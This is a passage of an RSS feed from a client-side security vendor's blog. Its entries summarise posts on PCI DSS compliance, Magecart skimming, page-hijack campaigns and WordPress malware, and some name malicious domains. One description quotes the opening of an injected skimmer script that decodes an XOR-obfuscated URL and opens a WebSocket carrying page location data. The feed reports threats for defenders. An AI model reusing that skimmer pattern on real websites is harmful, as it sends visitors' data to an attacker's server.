url="https://cside.com/content/images/2025/12/long-live-cryptojacking-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>Magecart targeting east asian e-commerce websites on OpenCart</title><link>https://cside.com/blog/magecart-targeting-east-asian-e-commerce-websites-on-opencart</link><guid isPermaLink="true">https://cside.com/blog/magecart-targeting-east-asian-e-commerce-websites-on-opencart</guid><description>We&apos;ve detected a magecart-style attack targeting the OpenCart CMS platform</description><pubDate>Tue, 15 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-this-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>Affiliate hijacking and traffic hijacking: how fraud scripts reroute users</title><link>https://cside.com/blog/how-traffic-hijacking-and-affiliate-fraud-can-harm-websites-and-users</link><guid isPermaLink="true">https://cside.com/blog/how-traffic-hijacking-and-affiliate-fraud-can-harm-websites-and-users</guid><description>Affiliate hijacking steals commissions two ways: SERP bidding fraud intercepts users pre-click, browser-side scripts rewrite attribution mid-session.</description><pubDate>Thu, 10 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-this-article-on-black-and-blue-background.png" length="0" type="image/png"/></item><item><title>cside at BlackHat USA 2025</title><link>https://cside.com/blog/c-side-at-blackhat-usa-2025</link><guid isPermaLink="true">https://cside.com/blog/c-side-at-blackhat-usa-2025</guid><description>cside is exhibiting at BlackHat USA 2025.</description><pubDate>Wed, 09 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/07/Frame-289133--1-.png" length="0" type="image/png"/></item><item><title>Is relying on Indicators of Compromise secure enough?</title><link>https://cside.com/blog/is-relying-on-indicators-of-compromise-secure-enough</link><guid isPermaLink="true">https://cside.com/blog/is-relying-on-indicators-of-compromise-secure-enough</guid><description>Most security programs today still rely heavily on Indicators of Compromise (IOCs). This approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.</description><pubDate>Thu, 03 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-the-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>Why crawlers can&apos;t help with PCI compliance (alone)</title><link>https://cside.com/blog/why-crawlers-cant-help-with-pci-compliance-alone</link><guid isPermaLink="true">https://cside.com/blog/why-crawlers-cant-help-with-pci-compliance-alone</guid><description>Crawlers act like a user but are very clearly not a real human user. If a malicious script would get injected because of a user interaction, the crawler will not see the malicious script unless it makes that user interaction</description><pubDate>Thu, 03 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cover-of-this-article-in-black-and-blue-background--1-.webp" length="0" type="image/webp"/></item><item><title>PCI Compliance 4.0.1: A Practical Implementation Guide Webinar</title><link>https://cside.com/blog/pci-compliance-4-0-1-a-practical-implementation-guide-webinar</link><guid isPermaLink="true">https://cside.com/blog/pci-compliance-4-0-1-a-practical-implementation-guide-webinar</guid><description>We partnered up with VikingCloud, the largest global PCI compliance QSA and security firm on 2 webinars giving you the full context and info to implement PCI DS 4.0.1. With a special focus on requirements 6.4.3 &amp; 11.6.1.</description><pubDate>Thu, 26 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/webinar-image-cover--3--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why We’re Called cside</title><link>https://cside.com/blog/why-were-called-c-side</link><guid isPermaLink="true">https://cside.com/blog/why-were-called-c-side</guid><description>We named ourselves after the part of the web that no one else was protecting: the client-side.</description><pubDate>Wed, 25 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-logo.webp" length="0" type="image/webp"/></item><item><title>CoinMarketCap Client-Side Attack: A Comprehensive Analysis</title><link>https://cside.com/blog/coinmarketcap-client-side-attack-a-comprehensive-analysis</link><guid isPermaLink="true">https://cside.com/blog/coinmarketcap-client-side-attack-a-comprehensive-analysis</guid><description>On June 20, 2025, CoinMarketCap (CMC), a major real-time crypto data platform, experienced a client-side security incident.</description><pubDate>Mon, 23 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/coin-market-cap-image-cover.webp" length="0" type="image/webp"/></item><item><title>Weaponized Google OAuth Triggers Malicious WebSocket</title><link>https://cside.com/blog/weaponized-google-oauth-triggers-malicious-websocket</link><guid isPermaLink="true">https://cside.com/blog/weaponized-google-oauth-triggers-malicious-websocket</guid><description>An attacker is using &apos;Google.com&apos; to deliver and execute their own code in a weaponized Google OAuth attack.</description><pubDate>Tue, 10 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/weaponized-google-oauth-image-cover.webp" length="0" type="image/webp"/></item><item><title>Ruthless Client-Side Attacks Targeting Multiple Platforms with ClickFix</title><link>https://cside.com/blog/ruthless-client-side-attacks-targeting-multiple-platforms-with-clickfix</link><guid isPermaLink="true">https://cside.com/blog/ruthless-client-side-attacks-targeting-multiple-platforms-with-clickfix</guid><description>In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.</description><pubDate>Wed, 28 May 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/clickfix-attack-image-cover.webp" length="0" type="image/webp"/></item><item><title>Chinese Adult Scam Targets Mobile Users Through PWA</title><link>https://cside.com/blog/chinese-adult-content-scam-targets-mobile-users-through-pwa-injection</link><guid isPermaLink="true">https://cside.com/blog/chinese-adult-content-scam-targets-mobile-users-through-pwa-injection</guid><description>We&apos;ve identified a fresh injection campaign abusing third-party JavaScript to redirect users.</description><pubDate>Tue, 20 May 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/pwa-injetion-cover-image.webp" length="0" type="image/webp"/></item><item><title>Malicious North Korean actors attempt to infiltrate technology companies</title><link>https://cside.com/blog/malicious-north-korean-actors-attempting-to-infiltrate-technology-companies</link><guid isPermaLink="true">https://cside.com/blog/malicious-north-korean-actors-attempting-to-infiltrate-technology-companies</guid><description>Catching fraudulent job applicants.</description><pubDate>Thu, 01 May 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/fraudulent-job-candidates-cover-image.webp" length="0" type="image/webp"/></item><item><title>Client-Side Attack Recap - Q1 2025</title><link>https://cside.com/blog/c-side-client-side-attack-recap-q1-2025</link><guid isPermaLink="true">https://cside.com/blog/c-side-client-side-attack-recap-q1-2025</guid><description>cside&apos;s research uncovered nearly 300,000 compromised websites in Q1 of 2025.</description><pubDate>Wed, 30 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/client-side-attack-report-image-cover.webp" length="0" type="image/webp"/></item><item><title>VikingCloud approves cside for PCI DSS requirement 6.4.3 and 11.6.1</title><link>https://cside.com/blog/vikingcloud-approves-c-sides-security-platform-for-pci-dss-v4-0-1-requirement-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/vikingcloud-approves-c-sides-security-platform-for-pci-dss-v4-0-1-requirement-6-4-3-and-11-6-1</guid><description>cside has partnered with VikingCloud to perform a deep technical assessment of the security solutions we offer under the enterprise plan, within the scope of PCI compliance. With proper implementation, our products meet requirements 6.4.3 and 11.6.1.</description><pubDate>Thu, 24 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-vikingcloud-partnership-cover-image.webp" length="0" type="image/webp"/></item><item><title>Free vs Paid PCI DSS Compliance: What Actually Works</title><link>https://cside.com/blog/comply-with-pci-dss-6-4-3-and-11-6-1-for-free</link><guid isPermaLink="true">https://cside.com/blog/comply-with-pci-dss-6-4-3-and-11-6-1-for-free</guid><description>The short answer: Without an off the shelf solution, you&apos;d have to build a DIY monitoring tool that would cos significantly more in wages than a prebuilt solution&apos;s vendor costs.</description><pubDate>Wed, 23 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/can-you-do-it-for-free-image-cover--1--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>What is PCI SSF? PCI SSF vs PCI DSS Explained (2026)</title><link>https://cside.com/blog/do-you-need-pci-ssf-or-pci-dss-heres-the-difference</link><guid isPermaLink="true">https://cside.com/blog/do-you-need-pci-ssf-or-pci-dss-heres-the-difference</guid><description>PCI SSF applies to payment software vendors. PCI DSS applies to merchants and anyone else handling cardholder data. Here is the practical breakdown for 2026.</description><pubDate>Tue, 22 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/pci-ssf-image-cover--1-.webp" length="0" type="image/webp"/></item><item><title>Over 150K websites hit by full-page hijack linking to Chinese gambling sites</title><link>https://cside.com/blog/over-150k-websites-hit-by-full-page-hijack-linking-to-chinese-gambling-sites</link><guid isPermaLink="true">https://cside.com/blog/over-150k-websites-hit-by-full-page-hijack-linking-to-chinese-gambling-sites</guid><description>We estimate that approximately 150,000 websites have been impacted by this campaign. The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese.</description><pubDate>Wed, 26 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/150k-websites-article-image-cover.webp" length="0" type="image/webp"/></item><item><title>Adyen PCI DSS Compliance: Merchant Steps and SAQ Levels</title><link>https://cside.com/blog/can-you-use-adyen-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-adyen-for-pci-dss</guid><description>Adyen is PCI DSS Level 1 certified, but merchants still own requirements 6.4.3 and 11.6.1 on their own checkout page.</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/adyen-pci-dss-image-cover.webp" length="0" type="image/webp"/></item><item><title>Braintree PCI DSS Compliance: What PayPal Merchants Still Need to Do</title><link>https://cside.com/blog/can-you-use-paypal-braintree-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-paypal-braintree-for-pci-dss</guid><description>Braintree holds PCI Level 1 certification as a PayPal service. Merchants remain responsible for payment page script monitoring under §6.4.3 and §11.6.1 regardless of integration type.</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/pci-compliant-paypal-how-cside.dev.webp" length="0" type="image/webp"/></item><item><title>Stripe PCI Compliance: What Stripe Covers, What You Own</title><link>https://cside.com/blog/can-you-use-stripe-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-stripe-for-pci-dss</guid><description>Stripe covers its own infrastructure. Merchants own §6.4.3 script authorization and §11.6.1 header monitoring on the checkout page.</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/pci-compliant-stripe-how-cside.dev.webp" length="0" type="image/webp"/></item><item><title>BSidesSF and RSAC Event</title><link>https://cside.com/blog/bsides-and-rsac-afterparties</link><guid isPermaLink="true">https://cside.com/blog/bsides-and-rsac-afterparties</guid><description>When cside is exhibiting, the afterparties are in town! Organized by us, Socket, Arcjet and Incident! Find our booth at BSidesSF (follow the laser), and booth 2438 at RSAC. Register for the 30th of April Book a meeting Join us for a cybersecurity networking event at the Rooftop of our investor Uncork Capital in San Francisco! Organized by cside, Socket, Arcjet, and Incident, these events bring together 250+ techies, cybersecurity professionals, and BS</description><pubDate>Thu, 13 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/bsides-rsac-afterparties-cside.dev.webp" length="0" type="image/webp"/></item><item><title>How to be a PCI DSS SAQ A company (6.4.3 and 11.6.1)</title><link>https://cside.com/blog/how-to-be-a-pci-dss-saq-a-company</link><guid isPermaLink="true">https://cside.com/blog/how-to-be-a-pci-dss-saq-a-company</guid><description>One sentence sparks debate. Because sites load scripts dynamically, a script from any page can persist into checkout, potentially interfering with payments. Third-party scripts, even if unrelated or on pages loaded before the payment pages, can introduce vulnerabilities.</description><pubDate>Fri, 07 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/how-to-be-a-pci-dss-image-cover.webp" length="0" type="image/webp"/></item><item><title>Thousands of websites hit by four backdoors in 3rd party JavaScript attack</title><link>https://cside.com/blog/thousands-of-websites-hit-by-four-backdoors-in-3rd-party-javascript-attack</link><guid isPermaLink="true">https://cside.com/blog/thousands-of-websites-hit-by-four-backdoors-in-3rd-party-javascript-attack</guid><description>While analyzing threats targeting WordPress frameworks, we found an attack where a single 3rd party JavaScript file was used to inject four separate backdoors into 1,000 compromised websites using cdn.csyndication[.]com/.</description><pubDate>Tue, 04 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/4-backdoors-image-cover.webp" length="0" type="image/webp"/></item><item><title>Bybit Attack: $1.5B stolen through malicious JavaScript</title><link>https://cside.com/blog/bybit-attack-1-5b-stolen-through-malicious-javascript</link><guid isPermaLink="true">https://cside.com/blog/bybit-attack-1-5b-stolen-through-malicious-javascript</guid><description>The attackers injected malicious JavaScript into the website interface where Bybit&apos;s employees normally approve transactions. This malicious code was hidden in such a way that everything looked normal on the screen, but behind the scenes, it changed important details.</description><pubDate>Thu, 27 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/1.5-billion-stolen-image-cover.webp" length="0" type="image/webp"/></item><item><title>Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam</title><link>https://cside.com/blog/over-35-000-websites-targeted-in-full-page-hijack-linking-to-a-chinese-language-gambling-scam</link><guid isPermaLink="true">https://cside.com/blog/over-35-000-websites-targeted-in-full-page-hijack-linking-to-a-chinese-language-gambling-scam</guid><description>A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user&apos;s browser window, often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.</description><pubDate>Thu, 20 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/35000-sites-attacked-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside is now SOC2 compliant</title><link>https://cside.com/blog/c-side-is-now-soc2-compliant</link><guid isPermaLink="true">https://cside.com/blog/c-side-is-now-soc2-compliant</guid><description>We&apos;re proud to announce our SOC2 type 2 audit has passed and we passed with the highest degree of approval.</description><pubDate>Wed, 05 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-soc2-compliant-image-cover.webp" length="0" type="image/webp"/></item><item><title>Demystifying the January 2025 updates to PCI DSS SAQ A</title><link>https://cside.com/blog/demystifying-the-january-2025-updates-to-pci-dss-saq-a</link><guid isPermaLink="true">https://cside.com/blog/demystifying-the-january-2025-updates-to-pci-dss-saq-a</guid><description>A full detailed explanation, chart and guide to the changes regarding PCI DSS 4.0.1 - 6.4.3 and 11.6.1</description><pubDate>Sun, 02 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/do-you-need-to-comply-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>10,000 WordPress Websites Found Delivering MacOS and Windows Malware</title><link>https://cside.com/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware</link><guid isPermaLink="true">https://cside.com/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware</guid><description>We identified over 10,000 WordPress loading showing fake Google browser update leading to malware downloads.</description><pubDate>Mon, 27 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/10000-wordpress-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Government and university websites targeted in ScriptAPI[.]dev client-side attack</title><link>https://cside.com/blog/government-and-university-websites-targeted-in-scriptapi-dev-client-side-attack</link><guid isPermaLink="true">https://cside.com/blog/government-and-university-websites-targeted-in-scriptapi-dev-client-side-attack</guid><description>Yesterday we discovered another client-side JavaScript attack targeting +500 websites, including governments and universities. The injected scripts create hidden links, pointing to external websites, inside the Document Object Model (DOM), the programming interface for web documents.</description><pubDate>Tue, 21 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-client-side-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Affiliate tracking and its cyber security risks</title><link>https://cside.com/blog/affiliate-tracking-and-its-cyber-security-risks</link><guid isPermaLink="true">https://cside.com/blog/affiliate-tracking-and-its-cyber-security-risks</guid><description>Malicious actors often exploit tracking pixels to inject harmful scripts on otherwise normal websites.</description><pubDate>Mon, 20 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/affiliate-tracking-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The cost of false positives - how we became a target</title><link>https://cside.com/blog/the-cost-of-false-positives</link><guid isPermaLink="true">https://cside.com/blog/the-cost-of-false-positives</guid><description>This week, we identified an intriguing use case involving the WP3[.]XYZ attack. It sparked interest across the community and led to better detection rates on platforms like VirusTotal. While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. We still want to keep the community aware of attacks like this and do better each time.</description><pubDate>Fri, 17 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/how-we-became-a-target-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack</title><link>https://cside.com/blog/over-5k-wordpress-sites-caught-in-wp3xyz-malware-attack</link><guid isPermaLink="true">https://cside.com/blog/over-5k-wordpress-sites-caught-in-wp3xyz-malware-attack</guid><description>We&apos;ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: &quot;https://wp3.xyz/plugin[.]php&quot;.</description><pubDate>Mon, 13 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-malware-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why Content Security Policy doesn&apos;t work</title><link>https://cside.com/blog/why-csp-doesnt-work</link><guid isPermaLink="true">https://cside.com/blog/why-csp-doesnt-work</guid><description>Content Security Policy (CSP) is a security feature provided by web browsers that a website owner can use to define a set of rules that control which resources (e.g., scripts, styles, images) can be loaded and executed by the browser. We call this the client-side, which is at the very end of the web supply chain. When properly configured, it helps prevent a wide range of attacks. But those first three words make all the difference. It can help prevent: Cross-Site Scripting (XSS): By restricti</description><pubDate>Tue, 07 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-csps-are-not-enough-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Ad marketplaces security and compliance risks</title><link>https://cside.com/blog/ad-marketplaces-security-and-compliance-risks</link><guid isPermaLink="true">https://cside.com/blog/ad-marketplaces-security-and-compliance-risks</guid><description>For businesses monetizing through ad marketplace models, the less traditional 3rd-party advertising networks, analytics platforms, and marketing scripts are indispensable. They&apos;re needed to drive revenue by boosting engagement and tracking user behavior.</description><pubDate>Mon, 23 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/ad-marketplaces-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>A new Progressive Web App danger very few know about</title><link>https://cside.com/blog/a-new-progressive-web-app-danger-very-few-know-about</link><guid isPermaLink="true">https://cside.com/blog/a-new-progressive-web-app-danger-very-few-know-about</guid><description>With the rise in adoption of PWAs comes an increase in client-side security risks. And the industry? It&apos;s barely talking about it.</description><pubDate>Fri, 20 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/new-pwa-danger-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Polyfill[.]io attack - More than just a redirect attack</title><link>https://cside.com/blog/polyfill-more-than-just-a-redirect-attack</link><guid isPermaLink="true">https://cside.com/blog/polyfill-more-than-just-a-redirect-attack</guid><description>A redirect was only what was caught. With control of one third-party script on half a million sites, far worse was possible. Here is why it mattered.</description><pubDate>Fri, 06 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/life-changing-sum-of-money-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com</title><link>https://cside.com/blog/new-3rd-party-js-script-attack-found-artifyaucom-and-quantifymycom</link><guid isPermaLink="true">https://cside.com/blog/new-3rd-party-js-script-attack-found-artifyaucom-and-quantifymycom</guid><description>This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here&apos;s a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a</description><pubDate>Mon, 04 Nov 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/artif-and-quantifymy-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>New Magecart attack code revealed</title><link>https://cside.com/blog/new-magecart-attack-code-revealed</link><guid isPermaLink="true">https://cside.com/blog/new-magecart-attack-code-revealed</guid><description>On October 14th, we posted an article on how another Magento Magecart attack was taking place. Then we only noticed one script as the culprit. Today, we were able to find and analyze the attack in more detail. The attack decoded This was the injected code: &lt;script&gt; const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo =&gt; hwo ^ zep)) + encodeURIComponent(location.h</description><pubDate>Wed, 23 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-magecart-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>How web extensions can hurt your site (INFIRC[.]com and INFIRD[.]com)</title><link>https://cside.com/blog/how-web-extensions-can-hurt-your-site-infirc-and-infird</link><guid isPermaLink="true">https://cside.com/blog/how-web-extensions-can-hurt-your-site-infirc-and-infird</guid><description>The domain infirc[.]com and infird[.]com have caused quite the stir recently, and highlighted the dangers of infected or malicious web extensions.</description><pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/web-extensions-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Internet Archive Hack: How JavaScript fits in the picture</title><link>https://cside.com/blog/the-internet-archive-hack-how-javascript-fits-in-the-picture</link><guid isPermaLink="true">https://cside.com/blog/the-internet-archive-hack-how-javascript-fits-in-the-picture</guid><description>The Internet Archive, also known as The Wayback Machine, experienced a security breach yesterday. This was not the first time it had been ta</description><pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-internet-archive-hack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The biggest Magecart attacks in history (so far)</title><link>https://cside.com/blog/the-biggest-magecart-attacks-in-history-so-far</link><guid isPermaLink="true">https://cside.com/blog/the-biggest-magecart-attacks-in-history-so-far</guid><description>The biggest Magecart breaches on record, from British Airways (2018) to CosmicSting (2024), and the browser-side monitoring that stops the skimmers.</description><pubDate>Thu, 17 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/the-biggest-magecart-attacks-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why do websites need 3rd party scripts?</title><link>https://cside.com/blog/why-do-websites-need-3rd-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/why-do-websites-need-3rd-party-scripts</guid><description>When developing a website, you&apos;ll often include libraries to help speed up the development process, and avoid reinventing the wheel. However</description><pubDate>Thu, 10 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/websites-need-3rd-party-scripts-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>cside joins the PCI Security Standards Council as an Associate Participating Organization</title><link>https://cside.com/blog/cside-joins-the-pci-security-standards-council-associate-participating-organization</link><guid isPermaLink="true">https://cside.com/blog/cside-joins-the-pci-security-standards-council-associate-participating-organization</guid><description>We&apos;re proud to announce that we&apos;ve joined the Payment Card Industry Security Standards Council (PCI SSC) as an Associate Participating Organization.</description><pubDate>Mon, 07 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-joins-pci-ssc-image-cover.webp" length="0" type="image/webp"/></item><item><title>Carlsberg a target in Magento &quot;CosmicSting&quot; malware attack</title><link>https://cside.com/blog/carlsberg-a-target-in-magento-cosmicsting-malware-attack</link><guid isPermaLink="true">https://cside.com/blog/carlsberg-a-target-in-magento-cosmicsting-malware-attack</guid><description>The term &quot;Magecart&quot; refers to attacks on the Magento platform. Recently, another large campaign was found to target Magento sites again. Among these, Carlsberg was one of the compromised websites. The pattern of these attacks is almost always the same. A single line of JavaScript loads content from a remote website. In other words, a 3rd party script. That code is then heavily obfuscated to delay detection even more. In this case, the payment process was quietly changed. A fake payment method</description><pubDate>Fri, 04 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/carlsberg-a-target-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside joins the W3C</title><link>https://cside.com/blog/cside-joins-the-w3c</link><guid isPermaLink="true">https://cside.com/blog/cside-joins-the-w3c</guid><description>We&apos;re incredibly proud to announce we have joined the W3C Web Application Security Working Group. The mission of the Web Application Security Working Group is to develop mechanisms and best practices to improve the security of web applications. Our whole team has been involved in cybersecurity for years. Through cside, we now aim to raise awareness and set higher standards for client-side security. By joining forces, we are one step closer to achieving both of our goals. We want to publicly t</description><pubDate>Fri, 04 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-joins-w3c-image-cover--2--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Kuwait ecommerce site is being used to facilitate client-side skimming attacks</title><link>https://cside.com/blog/kuwait-ecommerce-site-is-being-used-to-facilitate-client-side-skimming-attacks</link><guid isPermaLink="true">https://cside.com/blog/kuwait-ecommerce-site-is-being-used-to-facilitate-client-side-skimming-attacks</guid><description>A popular e-commerce site in Kuwait, running an outdated version of Magento (2.4), has been compromised by a malicious JavaScript injection,</description><pubDate>Thu, 03 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/website-being-used-image-cover.webp" length="0" type="image/webp"/></item><item><title>Threat feeds fail to detect attack for +2 years</title><link>https://cside.com/blog/threat-feeds-fail-to-detect-attack-for-over-2-years</link><guid isPermaLink="true">https://cside.com/blog/threat-feeds-fail-to-detect-attack-for-over-2-years</guid><description>On this website, we can see it&apos;s been active since August of 2022. We&apos;ve notified this, and other websites of this attack.</description><pubDate>Wed, 02 Oct 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/threat-feeds-image-cover.webp" length="0" type="image/webp"/></item><item><title>Why do developers obfuscate JavaScript?</title><link>https://cside.com/blog/why-do-developers-obfuscate-javascript</link><guid isPermaLink="true">https://cside.com/blog/why-do-developers-obfuscate-javascript</guid><description>As a client-side security company protecting JavaScript, we see a lot of obfuscated scripts. When you use our tool, you can actually see the deobfuscated version of the scripts to see what it is doing. Deobfuscation has been around for a while, but why is code obfuscated in the first place? JavaScript obfuscation came around to protect the source code of web applications from being easily understood, copied, or exploited by unauthorized users. Obfuscation as a concept predates JavaScript and e</description><pubDate>Tue, 01 Oct 2024 